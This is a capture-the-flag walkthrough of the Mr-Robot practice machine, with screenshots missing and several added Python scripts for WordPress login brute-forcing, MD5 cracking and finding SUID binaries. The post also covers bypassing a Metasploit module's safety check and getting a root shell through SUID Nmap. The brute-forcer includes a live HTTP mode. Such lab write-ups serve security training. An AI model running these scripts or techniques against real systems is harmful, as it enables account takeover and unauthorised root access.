Monday, June 18, 2018

Mr-Robot


MR-ROBOT

- Layout for this exercise:















1 - INTRODUCTION

- The goal of this exercise is to study the hacking process for the vulnerable machine Mr-Robot, from enumeration to root.

- According to the description provided by the authors of Mr-Robot there are 3 keys or flags to be found:



- Mr-Robot can be downloaded from here:



- Once downloaded and imported into VirtualBox:





2 - ENUMERATION


- Using netdiscover to find the IP that corresponds to the vulnerable machine Mr-Robot:




- Scanning with Nmap:



- Scanning with nikto we find a lot of information:









- After reading the nikto output we learn that a WordPress site is running, with its login script (wp-login.php) exposed, and also some other pages worth studying.


- Connecting to the website:



- Having a look at the source:




- Checking the wp-login.php page:




- When trying to connect to the admin page it hangs:




- Visiting wp-links-opml.php we learn that the website is running WordPress 4.3.16, which is outdated:




3 - EXPLOITATION

3.1 - robots.txt

- Also, robots.txt gives us key information to start the exploitation process:




- Opening key-1-of-3.txt we find the 1st key:



3.2 - Dictionary fsocity.dic

- Downloading fsocity.dic and saving it for further study:



- Copying to a working directory:



- Opening it with cat we find a very long text file made of many lines that look like the entries of a wordlist:


......

......


- The first 10 lines:



- Counting the lines there are 858160, so this is a large file to handle as-is:



- How many of the 858160 lines are unique? Just 11451, so removing the repeated lines would make it easier to deal with the file:




- Let's create a new file ufsocity.dic that contains only the unique lines of the original text file:

 




- Now the file ufsocity.dic can be used as a dictionary (wordlist) for the attacks that follow.


3.3 - Dictionary attack with Hydra

- With Hydra and ufsocity.dic we can perform a dictionary attack against the login page.

- Before launching the attack let's see what error message the login page returns, for instance using the invalid credentials admin:admin:




- As expected there is an error message Invalid username:




- Using this information as the failure string (F=Invalid username) let's find a valid username without caring about the password (-p wedontcare):




- We find a user elliot that can be used to try a login:




- The error message confirms that elliot is correct as a username:



- Launching Hydra again, now passing the user elliot (-l elliot) and ufsocity.dic as the password list, we discover the password ER28-0652:


 

- Using elliot:ER28-0652 the login is successful:
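- The two Hydra phases above, as an added Python example that is not part of the original post: phase 1 enumerates valid usernames with a throwaway password and the failure string "Invalid username", phase 2 tries the wordlist against the found user. The wordlist and the target are constructed inline (an in-process stand-in for wp-login.php with one account, elliot:ER28-0652), so the script runs offline; http_submit is the transport you would swap in for a live target, with the base URL as an assumed parameter. The de-duplication step keeps first-seen order, which `sort -u` does not, and order matters because Hydra tries candidates in list order.

```python
"""Added example (not the blog's own code): the two Hydra phases as Python,
run against an in-process stand-in for wp-login.php so it works offline.
The decision rule is the one Hydra applies with F=Invalid username: a
response without the failure string counts as a hit."""
import urllib.parse
import urllib.request

# Constructed mock target: one valid account (assumption, not the real box).
MOCK_USERS = {"elliot": "ER28-0652"}


def mock_submit(user, pwd):
    """Stand-in for POST /wp-login.php with WordPress's three distinguishable
    outcomes; the first two differing is what makes user enumeration work."""
    if user not in MOCK_USERS:
        return "<strong>ERROR</strong>: Invalid username."
    if MOCK_USERS[user] != pwd:
        return "<strong>ERROR</strong>: The password you entered is incorrect."
    return "<title>Dashboard</title>"


def http_submit(base_url):
    """Real transport for a live target (base_url is an assumed value such as
    http://10.0.0.5); posts the same form fields Hydra sends."""
    def submit(user, pwd):
        data = urllib.parse.urlencode(
            {"log": user, "pwd": pwd, "wp-submit": "Log In"}).encode()
        req = urllib.request.Request(base_url + "/wp-login.php", data=data)
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    return submit


def dedupe_wordlist(words):
    """Drop repeated and empty entries (858160 -> 11451 lines for fsocity.dic)
    while keeping first-seen order, which `sort -u` throws away."""
    seen = set()
    out = []
    for w in words:
        w = w.strip()
        if w and w not in seen:
            seen.add(w)
            out.append(w)
    return out


def classify(body):
    """Map a login response to one of the outcomes the failure string separates."""
    if "Invalid username" in body:
        return "invalid_user"
    if "ERROR" in body:
        return "bad_password"
    return "success"


def enumerate_users(submit, candidates, dummy_pwd="wedontcare"):
    """Phase 1 (hydra -L list -p wedontcare ... F=Invalid username):
    any name that does not trigger 'Invalid username' exists."""
    return [u for u in candidates
            if classify(submit(u, dummy_pwd)) != "invalid_user"]


def crack_password(submit, user, candidates):
    """Phase 2 (hydra -l user -P list ...): first candidate that logs in."""
    for pwd in candidates:
        if classify(submit(user, pwd)) == "success":
            return pwd
    return None


if __name__ == "__main__":
    words = dedupe_wordlist(["admin", "elliot", "admin", "ER28-0652", "mrrobot"])
    users = enumerate_users(mock_submit, words)
    print("valid users:", users)
    for u in users:
        print(u, "->", crack_password(mock_submit, u, words))
```

- Against a real target the only change is `submit = http_submit("http://TARGET")`; the classification logic is unchanged, which is exactly why Hydra's single F= string is enough for both phases.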





3.4 - Reverse shell with Metasploit

- Taking advantage of the fact that we have valid credentials, let's try to get a reverse shell with Metasploit:


- Searching for wp_admin_shell_upload:





- Using this exploit and setting options:






- Running the exploit fails with the error message "The target does not appear to be using WordPress":



- Locating the exploit module in Kali's file system:



- Opening it and commenting out the line that raises the previous error message (the WordPress fingerprint check), so the module skips that test:






- Reloading the module:



- Once modified and reloaded, the exploit is successful and a meterpreter session is opened:
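- Why that check can fail on a site that really is WordPress, shown with an added illustrative fingerprint (not Metasploit's own code; the exact strings wp_admin_shell_upload looks for are not reproduced here). A strict check that requires one marker, such as the generator tag, gives a false negative as soon as a theme or hardening plugin removes it, which is the situation in which commenting the check out, as above, gets the module past it. A tolerant check that counts several markers is the more robust way to do the same thing. The sample pages are constructed, not captured from the box.

```python
"""Added example (not Metasploit's code): an illustrative WordPress fingerprint,
to show how a pre-exploitation check can answer "not WordPress" for a site
that is running it.  MARKERS are common WordPress strings, not the module's."""
import re

# Strings a stock WordPress install leaves in its pages.  Hardening plugins
# commonly strip the generator tag; the login form fields are harder to hide.
MARKERS = {
    "generator": re.compile(r'<meta name="generator" content="WordPress'),
    "wp-content": re.compile(r"/wp-content/"),
    "wp-includes": re.compile(r"/wp-includes/"),
    "login-form": re.compile(r'name="log"'),
    "wp-submit": re.compile(r'name="wp-submit"'),
}


def wordpress_markers(body):
    """Return the set of marker names present in a page body."""
    return {name for name, rx in MARKERS.items() if rx.search(body)}


def looks_like_wordpress(body, require=("generator",)):
    """Strict check: every marker in `require` must be present.  Brittle: one
    removed tag and a real WordPress target is reported as something else."""
    found = wordpress_markers(body)
    return all(r in found for r in require)


def probably_wordpress(body, minimum=2):
    """Tolerant check: any `minimum` markers.  Fewer false negatives, at the
    cost of an occasional false positive on a hand-written page."""
    return len(wordpress_markers(body)) >= minimum


# Constructed sample responses (not captured from the Mr-Robot box).
STOCK_LOGIN = """<html><head>
<meta name="generator" content="WordPress 4.3.16" />
<link rel="stylesheet" href="/wp-includes/css/buttons.css" />
</head><body><form action="wp-login.php" method="post">
<input type="text" name="log" id="user_login" />
<input type="submit" name="wp-submit" value="Log In" /></form></body></html>"""

HARDENED_LOGIN = """<html><head>
<link rel="stylesheet" href="/wp-includes/css/buttons.css" />
</head><body><form action="wp-login.php" method="post">
<input type="text" name="log" id="user_login" />
<input type="submit" name="wp-submit" value="Log In" /></form></body></html>"""

PLAIN_PAGE = "<html><body><h1>Hello friend</h1></body></html>"

if __name__ == "__main__":
    for name, page in (("stock", STOCK_LOGIN), ("hardened", HARDENED_LOGIN),
                       ("plain", PLAIN_PAGE)):
        print(name, sorted(wordpress_markers(page)),
              "strict:", looks_like_wordpress(page),
              "tolerant:", probably_wordpress(page))
```

- The practical lesson is the one the walkthrough applied by hand: when a module aborts on a fingerprint you have already confirmed by other means (here wp-links-opml.php and the successful login), the check is the thing to bypass, not the target.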



- Getting a shell from the meterpreter session we find that we are running as an unprivileged user:




- Checking the IP:



- Upgrading to an interactive shell:



3.5 - Finding the second key

- Opening /home:



- In the robot user's home folder there is the 2nd key, but we cannot read it yet:




- However we can read a file containing robot's password hashed with MD5:




- Cracking the hash (MD5 is a one-way hash, so it is not decrypted: candidate passwords are hashed and compared until one matches):



- Switching to the user robot with the recovered password works:
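- The cracking step above, as an added example that is not part of the original post: a parser for user:hash lines of the raw-md5 form, and a cracker that hashes each candidate once and looks it up against every target hash. The sample line is constructed; its digest is the RFC 1321 test vector for the lowercase alphabet, not a value copied from the box, and the wordlist is a few inline strings where fsocity.dic would be used.

```python
"""Added example (not the blog's code): cracking 'user:hash' lines such as the
one in robot's home folder.  MD5 cannot be reversed, so each candidate is
hashed and compared.  SAMPLE_LINES is constructed; the digest is the RFC 1321
test vector for "abcdefghijklmnopqrstuvwxyz"."""
import hashlib
import re
import string

SAMPLE_LINES = """# constructed sample in user:md5hex format
robot:c3fcd3d76192e4007dfb496cca67e13b
nobody:not-a-hash
"""
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")


def parse_raw_md5(text):
    """Parse 'user:hash' lines, skipping comments and malformed entries."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        if HEX32.match(digest):
            entries[user] = digest.lower()
    return entries


def crack_md5(entries, candidates):
    """Return {user: password} for every hash matched by a candidate.
    One MD5 per candidate plus a dict lookup, so a large wordlist costs
    O(words), not O(words * users); stops early once every hash is matched."""
    wanted = {digest: user for user, digest in entries.items()}
    cracked = {}
    for cand in candidates:
        cand = cand.rstrip("\n")
        digest = hashlib.md5(cand.encode()).hexdigest()
        if digest in wanted:
            cracked[wanted[digest]] = cand
            if len(cracked) == len(wanted):
                break
    return cracked


if __name__ == "__main__":
    # Constructed wordlist standing in for ufsocity.dic.
    wordlist = ["password", "mrrobot", string.ascii_lowercase]
    print(crack_md5(parse_raw_md5(SAMPLE_LINES), wordlist))
```

- The same job is done by `john --format=raw-md5` or `hashcat -m 0` with ufsocity.dic as the wordlist; the point of the script is to make explicit that a "decrypted" MD5 is always a guessed one, which is why unsalted MD5 is no protection for a password that appears in any wordlist.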



- Now the 2nd key is available:




4 - PRIVILEGE ESCALATION

- Trying to access the root account's folder we receive a Permission denied message:



- Let's look for SUID files, which run with the privileges of their owner (root) rather than ours:



- For instance Nmap, version 3.81:



- Running old Nmap versions with special privileges such as SUID root is a known privilege escalation vector, because their interactive mode can spawn a shell:



- Because of the SUID bit, Nmap's interactive mode (nmap --interactive, then !sh) lets us run commands with root privileges:




- For instance, spawning a root shell:
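- The SUID hunt above, as an added Python example that is not part of the original post: the equivalent of `find / -perm -4000 -type f 2>/dev/null`, plus a filter that flags binaries known to hand out a shell when SUID root, such as the Nmap build on this box. SHELL_CAPABLE is an illustrative subset, not an exhaustive reference, and demo_tree builds a constructed directory with one SUID "nmap" so the script runs without scanning the real filesystem. Note that --interactive was removed from later Nmap releases, so this exact escalation depends on the old 3.81 binary present here.

```python
"""Added example (not the blog's code): find SUID regular files under a root
directory (what `find / -perm -4000 -type f` does) and flag the ones whose
names match tools that can spawn a shell when SUID root.  SHELL_CAPABLE is an
illustrative subset; demo_tree() builds a constructed sample tree."""
import os
import stat
import tempfile

# Illustrative: programs whose SUID-root copies can give a root shell
# (nmap via --interactive and !sh on old versions, the others via their
# own command or script execution features).
SHELL_CAPABLE = {"nmap", "vim", "find", "bash", "python", "perl", "less", "more"}


def find_suid(root="/", owner_uid=None):
    """Return sorted paths of SUID regular files under `root`, optionally only
    those owned by `owner_uid` (0 for root).  Unreadable directories are
    skipped, like find's 2>/dev/null; symlinks are not followed."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                if owner_uid is None or st.st_uid == owner_uid:
                    hits.append(path)
    return sorted(hits)


def flag_dangerous(paths):
    """Subset of `paths` whose basename starts with a known shell-capable tool
    (so 'nmap', 'python2.7' and 'vim.basic' all match)."""
    out = []
    for p in paths:
        base = os.path.basename(p)
        if any(base == t or base.startswith(t) for t in SHELL_CAPABLE):
            out.append(p)
    return out


def demo_tree():
    """Constructed sample: a temp tree with one SUID 'nmap' and one plain 'ls'."""
    d = tempfile.mkdtemp()
    bindir = os.path.join(d, "usr", "local", "bin")
    os.makedirs(bindir)
    suid = os.path.join(bindir, "nmap")
    plain = os.path.join(bindir, "ls")
    for p in (suid, plain):
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
    os.chmod(suid, 0o4755)   # SUID bit set; the owner is whoever runs this
    os.chmod(plain, 0o755)
    return d


if __name__ == "__main__":
    root = demo_tree()
    hits = find_suid(root)
    print("SUID files:", hits)
    print("worth a look:", flag_dangerous(hits))
    # On a real box: find_suid("/", owner_uid=0) and flag_dangerous(...) on it.
```

- On the real box the call is `find_suid("/", owner_uid=0)`; the owner filter matters because a SUID file owned by an unprivileged account gains nothing. Output from the flag step is a list of candidates to check by hand, not a verdict: whether a given SUID binary is exploitable depends on its version and build, as the Nmap --interactive case shows.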




5 - CAPTURING THE FLAG

- Going to the root folder we find the final 3rd key: